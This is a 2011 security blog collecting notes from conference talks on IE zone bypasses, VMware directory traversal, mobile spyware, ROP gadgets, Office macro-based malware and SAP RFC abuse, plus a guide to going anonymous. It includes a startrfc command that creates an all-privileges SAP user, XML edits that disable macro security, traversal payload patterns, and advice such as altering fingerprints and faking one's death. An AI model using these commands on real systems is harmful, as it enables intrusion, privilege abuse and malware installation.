Ethical-Hacker.net Blog - A Security Driven Knowledge

True Identity vs Anonymous: Evaluating real-life examples

2011-07-28T19:59:00.000-04:30

The privacy and dignity of our citizens are being whittled away by sometimes imperceptible steps. Taken individually, each step may be of little consequence. But when viewed as a whole, there begins to emerge a society quite unlike any we have seen, "a society in which government may intrude into the secret regions of a person's life".

Why be Anonymous?
"The right to be let alone is indeed the beginning of all freedom".
1.Everyone has the right to privacy.
2.Anonymous NOT EQUALS Law-breaker.
3.Requires intellect, desire, diligence, and dedication.

Cloak
-Minimally anonymous
-The FBI will find you

Dagger
-Moderately anonymous
-More difficult
-Potentially illegal
-The FBI can find you

Hermit
-Off the grid
-Completely invisible
-Up to you who finds you

Awareness
-Must develop new habits, gets easier over time
-Be discreet when talking to others
-Say as little as possible
-Identity awareness
-Use social engineering
-Look Around!
-Situational awareness
-Look for and avoid surveillance
-Blend in, do not stand out
-Ongoing process

Getting Started In Real Life
-Cancel All Subscriptions
-Forward Mail to a Secondary Address (Third-Party, Scanned Mail Service)
-Expunge legal and credit histories
-Place locks on credit files
-Shred everything

Getting Started Online
-Eliminate online profiles (Friendster, MySpace, Facebook, etc)
-Clean Up Search History
-Nothing in the Cloud (Host Your Own, Encrypt Everything)
-Everything in the Cloud (Host Nothing, Encrypt Everything)
-Format and Reinstall
-Create All New Accounts

Becoming Anonymous
-Change your name
-Alternative ID
-Alter fingerprints
-Sell registered properties
-Terminate all contracts
-Disposable email addresses (Dodgit, Guerilla Mail, Gmail, Hotmail, Yahoo)
-Mail box rentals (Mailboxes, Scanned Mail Service)
-Fake your own death

Shelter
-Single Room Occupancy (Cash rent, Long-term sublet, Shared utilities)
-Unregistered RV
-Commune (Kibbutz, Nudist Colony, Don’t Drink the Kool-Aid)
-Travel Continuously (Couch Surfing, Hostels, Shelters, Public Parks, Squatting)

Making Money
-Jobs that pay cash
-The world's oldest profession (e.g. Porn)
-Day labor
-Service industry
-Graphics and web design

Using Money
-Use Cash
-Classifieds, Cash Auctions
-Gift Cards, use as CCs
-Check Cashing Services
-Digital Money (E-Gold, Paypal Corporate, Internet Bartering)
-Money Orders
-Offshore Accounts
-Sugar Daddy

Transportation
-Public (Buses, Trains)
-Metro
-Cabs & Gypsy Cabs
-Greyhound
-Carpool / Rideshare
-Vehicles w/o Registration (Bicycles, 50cc Scooters)
-Travel in Disguise (Wear hats and glasses, Pre-determine camera locations)
-Avoid frequent mass-transit

Tracking
-Disable GPS devices
-Disable bluetooth
-Turn cell phone off when not in use
-RFID tags (RFID Zapper, Use a shielded wallet)
-Harden computers and smart phones
-Tinfoil hat

Communications
-Telecom (Pay phones, burners, Prepaid LD)
-Internet (Use email lightly, Internet Relay Chat, Usenet / classifieds)
-Encryption (Off the Record, Steganography)
-Phreaking
-Voice over IP (Hosted VoIP, BYO VoIP)

Online
-Public kiosks, local wifi
-Prepaid SIMs for data
-Use a Live CD
-Use tor, anonymous proxies
-Enable safe browsing
-Anonymous searching (startpage, googlesharing, customize google)
-Anonymous remailers
-Netbook + Truecrypt encrypted SSD, USB

Social Interaction
-Use disguises in public
-No long term communities
-Use a proxy
-Avoid people
-Avoid all social networking
-Avoid all publicity

The Rules
-Do not be your identity
-Get rid of your paper trail
-Use cash
-Constantly improve your situational awareness
-Blend in
-Encrypt everything

Internet Explorer: Your personal computer is public property

2011-07-06T19:39:00.000-04:30

A successful compromise will result in an attacker being able to blindly read every single file in the local drive.
–Either text and binary files (thanks MSXML2.DOMDocument.3.0!)
–Cross-domain information (Navigation history, Cookies)
–SAM backup files
–Recently opened files
–Personal pictures
–Other files, depending on the computer compromised (wwwroot in IIS, Configuration files for other applications)

Internet Explorer Internals
-Every browser has its own idiosyncrasies
-For the purposes of this presentation, it is convenient to review some design features of Internet Explorer
1.Security Zones
2.Zone Elevation
3.MIME type detection

Security Zones
-Enable administrators to divide URL namespaces according to their respective levels of trust and to manage each level with an appropriate URL policy Different treatment for web content depending on its source
-Five different sets of privileges (zones)
1.Restricted Sites
2.Internet
3.Trusted Sites
4.Local Intranet
5.Local Machine

Zone Elevation
-It occurs when a Web page in a given security zone loads a page from a less restrictive zone in a frame or a new window
-Internet Explorer behaves different based on which is the less restrictive zone up to which is trying to elevate
1.to the Local Machine zone is blocked
2.to the Intranet or Trusted Sites zones prompts for a confirmation
3.from the Restricted Sites zone to the Internet zone is allowed

MIME type detection
-Tests URL monikers through the FindMimeFromData method
-Determining the MIME type proceeds as follows:
1.If the suggested MIME type is unknown, FindMimeFromData immediately returns this MIME type as the final determination
2.If the server-provided MIME type is either known or ambiguous, the buffer is scanned in an attempt to verify or obtain a MIME type
3.If no positive match is obtained, and if the server-provided MIME type is known
4.If no conflict exists, the server-provided MIME type is returned. If conflict exist, the file extension is tried.
5.Otherwise defaults to text/plain or application/octet-stream

Features (vulnerabilities) enumeration
-Hiding the key under the doormat
-A chip off the old block
-Two zones, the same place
-How to put HTML/script code in remote computers
-Everything that glitters is not gold

Hiding the key under the doormat
-Internet Explorer cookies and history files are stored in different files and folders under %USERPROFILE%
-As a security measure, these files are stored inside randomly named folders with random file names
-These random names and locations are logged inside different mapping files named index.dat

%USERPROFILE%\Local settings\History\History.IE5\index.dat
%USERPROFILE%\Local settings\IECompatCache\index.dat
%USERPROFILE%\Cookies\index.dat

-These files are not entirely text formatted
-As these files work as maps to other files, access to these files would reveal the actual locations of mapped files and folders

A chip off the old block
-Internet Explorer resembles Windows Explorer in many aspects (both of them implement the Trident layout engine and both of them support UNC paths for SMB access)
-This way, Internet Explorer allows to access special files and folders, same as Windows Explorer does

Any web page in the Internet zone or above can include an HTML tag as follows:

-It will trigger an SMB request against 208.77.188.166
-As part of the challenge-response negotiation, the client sends to the server the following information about itself:
1.Windows user name
2.Windows domain name
3.Windows computer name
4.A challenge value chosen by the web server ciphered with the LM/NTLM hash of this user’s password

Two zones, the same place
-Internet Explorer will determine the security zone of a given UNC address as belonging to:
1.The Internet security zone if this path contains the IP address of the target machine
2.The Local Intranet security zone if this path contains the NetBIOS name of the target machine

-It makes sense, as SMB names just can be resolved in the same network segment
-\\NEGRITA is in the Local Intranet zone
-\\127.0.0.1 is in the Internet zone
-This is one of the root causes of the problems the Microsoft staff has into closing the attack vectors exposed here
-After several discussions with MSRC team members, they stated this issue is kind of a dead end, and cannot be fixed
-According to the Security Zones scheme, a page in a given zone can not redirect its navigation to a more privileged zone
-This behavior is known as Zone Elevation
-Now, consider the following dialog:

-In this case Internet Explorer will erroneously (due to this ambiguity) apply Zone Elevation restrictions and the redirection will effectively occur
-There is another way to bypass Security Zone restrictions
-Suppose that example.com (10.1.1.1) was explicitly added to the Restricted Sites Security Zone
-Then this URI will be treated with the privileges of that zone
-However, if the same resource is requested using the UNC notation, it will be treated as belonging to the Internet Security Zone (e.g. \\10.1.1.1\index.html)
-Restricted Sites restrictions to a given resource are bypassed if it can be accessed using a different protocol [file: | https: | ...]

How to put HTML/script code in remote computers
-There are different ways for remote servers to write HTML/script code in clients hard drives
1.Navigation history files
2.Cookies
3.Mapping files (Internet Explorer index.dat)

-Problems in the design/implementation of these feature
1.Contents are saved as they were received, with little or no sanitization/overhead, into these files
2.Internet Explorer allows rendering the contents of non-pure HTML files skipping the parts that can not be rendered

Everything that glitters is not gold
-The way Internet Explorer decides how to treat a given file is known as MIME type detection
-It basically uses an algorithm to find and launch the correct object server/application to handle the requested content
-Is based on information obtained from
1.The server-supplied MIME type, if available
2.An examination of the actual contents associated with a downloaded URL (FindMimeFromData)
3.The file name associated with the downloaded content (assumed to be derived from the associated URL)
4.Registry settings (file extension/MIME type associations or registered applications) in effect during the download

-Problems in the design/implementation of this feature:
1.The server-provided MIME type is returned when the following conditions are true:
-no positive match is obtained from the FindMimeFromData() buffer scan
-server-provided MIME type is known
-no conflict exists (format is either text or binary)

2.Has been probed (more than once) not to behave deterministically when accessing the same resource through different methods
-direct navigation
-redirection
-frame/iframe reference
-scripting

Turning features into vulnerabilities to build an attack
-In and of itself each of these bugs may not seem like something you should be concerned about
-The combined use of them by an attacker may lead to some interesting attacks

Case 1: Attacking local networks with shared folders

Case 2: Attacking the Internet user

Overall Impact
-By chaining the exploitation of a series of weak features an attacker is able to store HTML and scripting code in the victim’s computer and force the victim’s browser to load and render it
-127.0.0.1 is in the Internet Zone, but as the code is actually stored in the victim’s computer, it can access other files in the same computer (in this case, the victim’s computer)
1.SAM backup files
2.All of the victim’s HTTP cookies and history files
3.Source files in Inetpub\wwwroot
4.Recent files, personal pictures (thumbs.db maps these files)
5.Any other file on the local system (system events, configurations)

These attack scenarios have been proven to work:
1.CORE-2008-01035
2.CORE-2008-0826
3.CORE-2009-06256

-The only difference is in the way Internet Explorer is tricked into rendering its internal tracking files as HTML
-That is the only thing Microsoft is fixing. This is a design problem. They are just blocking our proof of concept
-That is why we are breaking it over and over again

Solutions and Workarounds
-Internet Explorer Network Protocol Lockdown
-Set the Security Level setting for the Internet and Intranet zones to High
-Disable Active Scripting for the Internet and Intranet zone with a custom setting
-Only run Internet Explorer in Protected Mode
-Use a different web browser to navigate untrusted web sites

Attacking VMWare Guest Machines

2011-06-30T18:55:00.000-04:30

Vulnerability Discovery
-Vulnerability identified on 5/14/09
-Reported to VMware on 5/15/09
-VMware responded on 5/21/09
-CVE-2009-3733 reserved on 10/20/09
-VMSA-2009-0015 released on 10/27/09
-"Directory Traversal vulnerability"

Identification
-Originally identified on VMware Server 2.0.1 build 156745 (on Ubuntu 8.04)
-Thought to be localized to inside of NAT interface of Host (8307/tcp)
-Can steal VMs from within other VMs... if NAT.

Description
-Web Access web servers also vulnerable
-Server (default ports 8222/8333) - ../ x 6
-ESX/ESXi (default ports 80/443) - %2E%2E/ x 6
-No longer requires NAT mode / Remotely exploitable
-Not as straightforward as originally thought
-Still trivial to exploit because...

Root Access Is Easy

How it works?

-Web server on 8308/tcp is vulnerable, but will only serve certain filetypes (xml, html, images, etc.)
-Web server on 8307/tcp is also vulnerable, but serves ALL filetypes
-Simply append /sdk to our URL request and we’ve got complete access to Host filesystem (including other Virtual Machines)
-ESX/ESXi - ALL web servers return ALL filetypes (no /sdk)

Vulnerable Versions
Server
-VMware Server 2.x < 2.0.2 build 203138 (Linux)
-VMware Server 1.x < 1.0.10 build 203137 (Linux)

ESX/ESXi
-ESX 3.5 w/o ESX350-200901401-SG
-ESX 3.0.3 w/o ESX303-200812406-BG
-ESXi 3.5 w/o ESXe350-200901401-I-SG

Guest Stealer
-Perl script remotely ‘steals’ virtual machines from vulnerable hosts
-Supports Server, ESX, ESXi
-Allows attacker to select which Guest to ‘steal’
-Utilizes VMware configuration files to identify available Guests and determine associated files

VMINVENTORY.XML
-/etc/vmware/hostd/vmInventory.xml (default location)
-Gives us Guest inventory & location information

Mitigation
-Patch, patch, patch
-Hosts are an attractive target (compromise one = access many)
-Better yet...Segment, segment, segment
-Segment management interfaces
-Segment systems of different security levels
-Don’t share physical NICs between different security levels
-Virtualization is not always the "best answer"

Broad View of Cloud Security

2011-06-28T19:25:00.000-04:30

Cloud Computing in the security industry has multiple definitions and several approaches:

-URL scanning
-AV scanning
-Spam scanning
-RBL
-and more...

Cloud Paradigm
-Pro Cloud
-Against Cloud
-A hybrid approach is better

Strenghts
-No versioning (no large product updates)
-Low resource consumption
-Higher speed
-Not OS dependant
-Not hardware dependant
-Instant access to updates
-New technologies available like outbreak detection or statistics based algorithms
-Sometimes...It is also cheaper

Weaknesses
-No internet connection means no cloud
-Susceptible to DDOS attacks
-Resource Consumption just moved in the cloud. It didn’t vanished!
-Connection spikes can cause false negatives (or, even self-DDOS)
-Instant updates can also mean instant faulty updates
-Data center failure means no detection

What Else Can Cloud Offer?
Opens the door to a new set of:
-Applications
-Devices
-Operating systems

Size Does Matter
-Several sources of URLs means an extremely large number of URLs
-Several clients that query the cloud means a massive number of links that have to be analyzed
-Links have various statuses (clean, infected, phishing, fraud) which change dynamically
-So, one has to move fast...

Lies, Damned Lies and Statistics
-Targeted attacks stay under the radar
-Slow spreading malware too

Not everybody likes us
-Website owners
-ISPs
-Maybe even social networks?
-And hopefully the bad guys (i.e. Hackers)

Conclusion
-We believe that a hybrid approach is best
-The cloud should be used as another filtering method and not as a universal solution
-Not only there should be a hybrid approach, but also these techniques have to be interconnected
-Although it looks quite easy in theory, creating and maintaining a cloud architecture is not an easy process

Advanced Mobile Spyware

2011-06-15T20:14:00.000-04:30

Mobile Spyware

-Often includes modifications to legitimate programs designed to compromise the device or device data
-Often inserted by those who have legitimate access to source code or distribution binaries
-May be intentional or inadvertent
-Not specific to any particular programming language
-Not specific to any particular mobile Operating System

Attacker Motivation
Practical method of compromise for many systems
–Let the users install your backdoor on systems you have no access to
–Looks like legitimate software so may bypass mobile AV

Retrieve and manipulate valuable private data
–Looks like legitimate application traffic so little risk of detection

For high value targets such as financial services and government it becomes cost effective and more reliable
–High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation
–Think "Aurora" for Mobile Devices

FlexiSpy
http://www.flexispy.com
$149 -$350 PER YEAR depending on features
Features:
–Remote Listening
–C&C Over SMS
–SMS and Email Logging
–Call History Logging
–Location Tracking
–Call Interception
–GPS Tracking
–Symbian, Blackberry, Windows Mobile Supported

Mobile Spy
http://www.mobile-spy.com
$49.97 PER QUARTER or $99.97 PER YEAR
Features:
–SMS Logging
–Call Logging
–GPS Logging
–Web URL Logging
–BlackBerry, iPhone(JailbrokenOnly), Android, Windows Mobile or Symbian

Etisalat (SS8)
-Cell carrier in United Arab Emirates (UAE)
-Pushed via SMS as "software patch" for Blackberry smartphones
-Upgrade urged to "enhance performance" of Blackberry service
-Blackberry PIN messaging as C&C
-Sets FLAG_HIDDEN bit to true
-Interception of outbound email / SMS only
-Discovered due to flooded listener server cause retries that drained batteries of affected devices
-Accidentally released the .jar as well as the .cod (ooopsie?!)

Bugs & Phonesnoop
–Exfiltration of inbound and outbound email
–Hidden
–Remotely turn on a Blackberry phone microphone
–Listen in on target ambient conversation

Storm8 Phone Number Farming
–iMobstersand Vampires Live (and others)
–"Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhoneuser who downloads any Storm8 game," the suit alleges. "... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed."
–"Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue."

Symbian Sexy Space
–Poses as legitimate server ACSServer.exe
–Calls itself 'Sexy Space'
–Steals phone and network information
–Exfiltrates data via hacker owned web site connection
–Can SPAM contact list members
–Basically a "botnet" for mobile phones
–Signing process: Anti-virus scan using F-Secure (Approx 43% proactive detection rate (PCWorld))
-Random selection of inbound manually assessed
–Symbiansigned this binary as safe!

09Droid –Banking Applications Attack
–Droid app that masquerades as any number of different target banking applications
–Target banks included: Royal Bank of Canada, Chase, BB&T, SunTrust, Over 50 total financial institutions were affected
–May steal and exfiltrate banking credentials
–Approved and downloaded from Google’s Android Marketplace!
–http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps-market
–http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953

Blackberry Takes Security Seriously
-KB05499: Protecting the BlackBerry smartphoneand BlackBerry Enterprise Server against malware: http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB05499
-Protecting the BlackBerry device platform against malware: http://docs.blackberry.com/en/admin/deliverables/1835/Protectingthe BlackBerry device platform against malware.pdf
-Placing the BlackBerry Enterprise Solution in a segmented network: http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf
-BlackBerry Enterprise Server Policy Reference Guide: http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Reference_Guide.pdf

Does It Really Matter?
-Only 23% of smartphone owners use the security software installed on the devices.
(Source: Trend Micro Inc. survey of 1,016 U.S. smartphoneusers, June 2009)
-13% of organizations currently protect from mobile viruses
(Mobile Security 2009 Survey by Goode Intelligence)

Code Signing
-Subset of Blackberry API considered "controlled"
-Use of controlled package, class, or method requires appropriate code signature
-Blackberry Signature Tool comes with the Blackberry JDE
-Acquire signing keys by filling out a web form and paying $20
–This not is a high barrier to entry
–48 hours later you receive signing keys
-Install keys into signature tool
-Hash of code sent to RIM for API tracking purposes only
-RIM does not get source code
-COD file is signed based on required keys
-Application ready to be deployed
-Easy to acquire anonymous keys

IT Policies
-Requires connection to Blackberry Enterprise Server (BES)
-Supersedes lower levels of security restrictions
-Prevent devices from downloading third-party applications over wireless
-Prevent installation of specific third-party applications
-Control permissions of third party applications
–Allow Internal Connections
–Allow Third-Party Apps to Use Serial Port
–Allow External Connections
-MOSTLY "Default Allow All" policy for BES and non-BES devices

Application Policies
-Can be controlled at the BES
-If no BES present, controls are set on the handheld itself
-Can only be MORE restrictive than the IT policy, never less
-Control individual resource access per application
-Control individual connection access per application
-MOSTLY "Default Allow All" policy for BES and non-BES devices

Installation Files
-.COD files:A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code.
-.JAD files:An application descriptor that stores information about the application itself and the location of .COD files
-.JAR files:a JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata.
-.ALX files:Similar to the .JAD file, in that it holds information about where the installation files for the application are located

txsBBSpy Logging and Dumping
-Monitor connected / disconnected calls
-Monitor PIM added / removed / updated
-Monitor inboundSMS
-Monitor outbound SMS
-Real Time trackGPS coordinates
-Dump all contacts
-Dump current location
-Dump phone logs
-Dumpemail
-Dump microphone capture (security prompted)

txsBBSpy Exfiltration and C&C Methods
-SMS (No CDMA)
-SMS Datagrams(Supports CDMA)
-Email
-HTTP GET
-HTTP POST
-TCP Socket
-UDP Socket
-Command and control hard codedto inbound SMS

Future Work (Offensive AND Defensive)
-Reverse engineer .cod file format
-Continued research into unobstructed installation methods (requires exploitation)
-Infect PC with virus that acts as distribution hub
-Research additional exfiltration methods for tunneling without prompting

Automated Independent Gadget Search

2011-06-14T20:09:00.000-04:30

Goal
The goal of this research is to be able to use return-oriented programming platform independently across multiple platforms.

Motivation
-CPU Architecture diversity is increasing.
-We want to execute code on machines despite the presence of non-executable memory, but we do not aim for ASLR.

History

Strategy
-Use only already present code
-No single instruction / return like approach
-Use REIL to be platform independent
-Use "free-branch" instructions rather than ret only
-"Find all first, then filter useful ones" approach
-Keep an eye on side-effects and minimize them

Small RISC instruction set:
-17 instructions for arithmetic, control flow and misc functionality
-Instructions are always side-effect free

Interpreter:
-Virtually unlimited memory and temporary registers
-Implemented as a register machine

No support for:
-Exceptions, floating point instructions, 64Bit instructions yet

Algorithms

Algorithms stage I
Collect data from the binary:
1.Extract expression trees from native instructions
-Handlers for each possible REIL instruction
-Most of the handlers are simple transformations
-Memory store and conditional execution need special treatment

2.Extract path information
-Path is extracted in reverse control flow order
-We want to have all possible outcomes for a conditional execution in a single expression tree

Algorithms stage II
Merge the collected data from stage I:
1.Combine the expression trees for single native instructions along a path

1:  0x00000001 ADD R0, R1, R2  
2:  0x00000002 STR R0, R4  
3:  0x00000003 LDMFD SP! {R4,LR}  
4:  0x00000004 BX LR

2.Determine jump conditions on the path
3.Simplify the result

Algorithms stage III
Goal of the stage III algorithms:
-Search for useful gadgets in the merged data. Use a tree match handler for each operation.
-Select the simplest gadget for each operation. Use a complexity value to determine the gadget which is least complex (side-effects).

Results
-Algorithms for platform independent return-oriented programming are possible
-We are able to find all necessary gadgets for return-oriented programming using our tool
-Searching for gadgets is not only platform but also very compiler dependent
-Minimizing side-effects is possible if the right approach is chosen

Future work
-Abstract gadget description language
-Automatic gadget compiler for all platforms
-Bring more platforms to REIL
-Better understand the implications of different compilers

Office Documents: New Cyber Weapons

2011-04-24T20:18:00.000-04:30

Reallity of cyberwarfare
-August 2007: Espionage case of China against German chancelery. 163 Gb of Gouvernemental data stolen through a Trojan-infected Office document.
-2009 to 2010: Chinese hackers succeeded in stealing economic and financial data from European Banks, through malicious PDFs.

Document as cyberweapons
-(Open)Office document are good vectors
-PDF documents are also used nowadays

The Cyberwarfare Show
-PWN2KILL, May 2010 Paris, challenge has proved the risk is real and high.
http://www.esiea-recherche.eu/iawacs2010.html
-Huge technical possibilities on one side, quite no protection and detection capability on the other side.
-Many critical systems are rather secure with a strong security policy enforced.
-Classical approaches are less and less possible, not say impossible.

Which applications are concerned?
-Office 2010
-OpenOffice 3.x
-All other office applications

What is the Purpose?
-To install malicious payload into the operating system, whithout being detected by any AV.
-We do not want to exploit any vulnerability (target = secure sensitive systems e.g. combat systems).

Macro Security in MSO
Possible level of security:
Level 4 (0x00000004): Disable all macros without notification.
Level 3 (0x00000002): Disable all macros with notifiation.
Level 2 (0x00000003): Disable all macros except digitally signed macros.
Level 1 (0x00000001): Enable all macros.

Location of settings:
Registery key : HKEY_CURRENT_USER\Software\Microsoft\Office\ 12.0\ \Security
Application = {Word, Excel, Powerpoint, Access}

Trusted location:
A trusted location is a directory where macros of documents stored inside are allowed to be executed automatically.

Macro Security in OpenOffice
Security settings:
Both Macro security level and trusted location are defined in "Common.xcu" file at:
Openoffice.org\3\user\registery\data\org\openoffice\Office

Example:

1:  <node oor:name="Security">  
2:  <node oor:name="Scripting">  
3:  <prop oor:name="MacroSecurityLevel" oor:type="xs:int">  
4:  <value>0</value></prop></node></node>

Trusted Location:
Set the root directory as Trusted location

1:  <node oor:name="Security">  
2:  <node oor:name="Scripting">  
3:  <prop oor:name="SecureURL" oor:type="oor:string-list">  
4:  <value>file:///C:/</value></prop></node></node>

The use of 'AutoExec' event with MSO:
-Able to naturally bypass the level 2 of execution.
-Several events are available: AutoNew, Open, Close, Exit, Exec
-Applied on template named Normal.dotm and stored inside MSO's users settings file.
-Execute the macro at opening event even if any macro are not allowed to be executed (Level 2).

MSO and OO: The integration
-Both are based on the W3C specification. But the integration is totally different.

MSO’s integration:
-Office makes it easier to create signatures.
-It is possible to create self-signed certificates.
-They are stored inside _rel\.rel file within the document.

Openoffice’s integration:
No significant change about signature since 2006, the first study.
Black Hat 2009, Amstersdam, E.Filiol J.-P. Fizaine, Openoffice v3.x Security Design Weaknesses.

MSO Case
+Change to the lowest level: 0
Interesting Keys: HKEY_CURRENT_USER
Path: Software\\Microsoft\\Office\\12.0\\Word\\Security
Windows API: RegOpenKeyEx, RegSetValueEx, RegCreateKeyEx, RegCloseKey

+Set the directory c:\Users as a Trusted Location.
KEY: HKEY_CURRENT_USER
Path: Software\\Microsoft\\Office\\12.0\\Word\\Security\\Trusted\\Locations
Path2: Software\\Microsoft\\Office\\12.0\\Word\\Security\\Trusted\\Locations\\Location3

OpenOffice Case
+Change the Macro security level to the lowest: 0
-Settings are stored in only one file! No use of specific library is needed, the C Standard Library is sufficient.
-Forge the Path
-Locate the position inside the file
-Insert the value:

1:  <node oor:name="Security"> <node oor:name="Scripting">  
2:  <prop oor:name="MacroSecurityLevel" oor:type="xs:int">  
3:  <value>0</value> </prop> </node> </node>

-Update by restart the application

+Trusted Locations
-Insert the value:

1:  <node oor:name="Security"> <node oor:name="Scripting">  
2:  <prop oor:name="SecureURL" oor:type="oor:string-list">  
3:  <value>file:///C:/</value> </prop> </node> </node>

K-ary Malware
Malware made of k-different, innocent-looking (from the AV point of view). Each of them can (inter)act independently or not and can either be executed in parallel or in sequential. Not all the parts are necessarily executable. The cumulative action of each part defines the malware action.

Proof of Concept (PoC):
E. Filiol, Journal in Computer Virology, 2007.
Hack.lu 2009, A. Desnos, Implementation of K-ary viruses in Python.

Two waves of attack: The use of 2-ary malware
Suppose the security level is set to the paranoid mode, it is impossible to change the level from inside the macro.

Journal in Computer Virology, 2006, D. de Drézigué, J.- P. Fizaine, N. Hansma, In-depth Analysis of the Viral Threats with OpenOffice.org Documents

Why this approach?
-Attacking (secure) systems becomes really complex. Just exploiting one or more vulnerability does no longer suffice. Installing a functionnally sophisticated program is less and less easy. The solution is to split the viral information into many pieces!
-Real case: secure systems generally filter and forbid packed binaries/shellcodes.
-Using 2-ary malware is a powerful alternative.
-The first executable performs a innocent, generally legitimate simple action.
-The office document then installs more complex malware transparently and silently.

Protection and Countermeasures
-Use of Public Key Infrastructure
-Whenever self-signed certificates are used. Check the serial number, timestamp and validity systematically. The serial number is supposed to be unique.

The Black Market of your Digital Data Illustrated

2011-04-06T19:29:00.000-04:30

Ineffectiveness of AntiVirus Solutions

2011-02-11T18:42:00.000-04:30

Many recent high profile attacks into major software companies, public sector institutions and international organizations.
–Aurora attack on Google and 32 other companies last year
–In all cases: malicious email was sent to victim

Email-borne threats fall into two general categories:
–Mass email attacks
–Targeted attacks
Traditional AV increasingly ineffective and heuristic engine is necessary.

Typical Bredolab/Trojan.Sasfis
Most prolific family of mass-mailed threats using executable attachment.
Social engineering lures:
–Social Media website password reset
–Western Union or UPS invoice
–"You have received an E-Card!"
–Spammed out in very large numbers (Cutwail botnet)
–Many different payloads
–13.3% of all Malware stopped by Skeptic
–Between June 2009 and June 2010 (excluding Phish and links)
–Typically low AV detection (< 10 on VT)
–Good social engineering tactics
–Use of Word or Excel icons
–Spoof prolific companies (Facebook, UPS, Fedex)
–Heavy use of server-side polymorphism (SSP) to evade signature-based AV

Signature-based AV
–Create a "signature" for a piece of Malware
–String(s) of bytes
–Checksum(s)
–Very specific
–Evidence of increased use of SSP
–In 2008, Symantec created 1,691,323 new malicious code signatures
–In 2009, 2,895,802 new signatures were created (71% increase)
–139% increase from 2007 to 2008
–Not sustainable!
–Solution: heuristic-based approach

Signature Development Process

Heuristic-based Approach
–Generic detection
–Features known to exist in Malware
–Decision based on extracted features
–Weighted
–Cloud based
–no reactive signature deployment delays

Polymorphic Viruses
–Big problem for AV
–Many different variants
–Functionally equivalent
–Signatures required for each variant
–Solution: "emulation"
–Emulate past decryptor stub
–Sig the static virus body

Server-side polymorphism (SSP)
–Custom encryption routine
–Decrypt at runtime
–Generated by a polymorphic engine
–Hundreds or perhaps thousands of unique variants
–Random junk instructions
–API calls
–Arithmetic
–EP

Use in mass-email attacks
–Attackers generate a number of unique binaries
–Change the binary being spammed throughout the attack
–Problem for any vendor without proactive protection in place

Bredolab Case Study - 30 March 2010
–Standard Bredolab run:
–Subject: variation of 'UPS Delivery Problem NR 18800'
–Attachment: similarly named 'UPS_invoice_1845.exe'
–relatively small (only 56 observed copies)
–Started at 19:08:33 GMT (time 0)
–Last observed sample at 19:36:31
–Total of 27 min 59s

Case Study - AV Detection & Response Time
–At time 0, AV detection was 0
–Average response time?
–661 minutes (11 hours and 1 minute)
–Remember that the attack only lasted 28 mins
–This is the average response time
–INEFFECTIVE

Aurora and Targeted Attacks (Spear-Phishing)
–Aurora/Hydraq
–Up to 34 different companies compromised in same period using similar techniques
–Email links to malicious web pages
–Flaws in Adobe Acrobat Reader
–Google hackers are back?
–CVE-2010-2883

According to US Department of Defense Cyber Crime Center:
"102 breaches of the Pentagon’s agencies, partners and contractors in a two-year period ending August 2009"

Targeted Attack Case Study - 24 March 2010
–Targeted attack blocked attempting to exploit CVE-2010-0188 (libTiff)
–Single copy sent to an individual in a major international organization
–Co-ordinates governments from around the world
–Trojanized a clean PDF from a World Cup travel site

Case Study - AV Detection & Response Time
–AV detection was 0
–One week later, AV detection at 33%
–Sample sharing, blogged
–Average response time?
–3631 minutes (two and a half days)
–Only takes into account the 33% of vendors that were actually detecting the threat
–INEFFECTIVE

Targeting SAP Platform Using Trojans and Rootkits

2011-01-31T17:40:00.000-04:30

Typical Enterprise Environment
-Has more than a thousand of employees
-Is a circus of IT Systems
–Mixture of operating systems, databases, applications and their different versions
-Decision makers care more about their bonus than the interest of the company
-Is a political battlefield

Enterprise Security
Even a medium level of IT security is too expensive to achieve
–Missing asset management (how many Oracle DBs, Windows servers, etc)
–Tons of security scanning, to few remediation chasing
–Many of the vulnerabilities cannot be mitigated
-Obsessed by Cross Site Scripting
-IT security departments cannot influence security decisions of business applications much, because of political reasons.
-Nobody cares about the hacked UNIX machine, SQL DB, or others.
-Defacement and similar security incidents are budget approvers

SAP Systems
-Business specific
-Industry solutions
-Hold the Crown Jewels
-Are usually extensively customized
-Less exposure to typical hackers (ABAP)

SAP Security
-Security mostly focuses on authorizations and segregation of duties
-Intrusion prevention is still a baby
-Risks are underestimated/general IT Security efforts are typically unbalanced at companies
-Unlike e.g Active Directory, SAP systems belong to the business, not the IT
-Security departments usually fail when they are challenged

RFC (Remote Function Call) protocol lets you run functions remotely
–To run; use Java, C, etc. with RFC-SDK or simply execute the test program "startrfc". Following
creates a new user with god rights:

startrfc -3 -h 10.1.5.4 -s 05 -c 010 -u ERTUNGA -p CCC42 -F SUSR_RFC_USER_INTERFACE
-E USER=SATRIANI -E ACTIVITY=01 -E PASSWORD=RUBINA -E USER_TYPE=A -T USER_PROFILES,
12,r=-SAP_ALL

There is no exploit involved. Everything is intended functionality.
–Beats "RFC users are not a threat because they cannot login via SAPGUI"
–Time to recheck company’s shared folders and eliminate hardcoded passwords.

RFC (a.k.a communication) users are thus very very important!
–Secure their passwords and make them part of the password change process
–Don’t forget: GUI (dialog) users which have S_RFC rights can also execute remotely
–SAP_ALL FOR COMMUNICATION USERS IS A NO GO!

RFC_READ_TABLE
Reads the contents of any table (Including ones with sensitive data e.g salary information)
Has bugs in converting e.g binary fields

SUSR_RFC_USER_INTERFACE
Can be used for creating/modifying users

RFC_ABAP_INSTALL_AND_RUN
-Takes ABAP source lines and executes them
-Widely known! tighten user authorizations to prevent abuse
-More restricted in latest NetWeaver Systems

RFC can be encapsulated in SOAP messages (SOAP RFC)
-Company’s internal proxy suddenly opens the doors to all SAP systems
-Disable it if not used!

Single Sign-on (SSO2)
-Is a convenient feature, not a security feature
-RTFM: Secure Store and Forward [SSF] documentation
-Personal Security Environment files hold the private key data
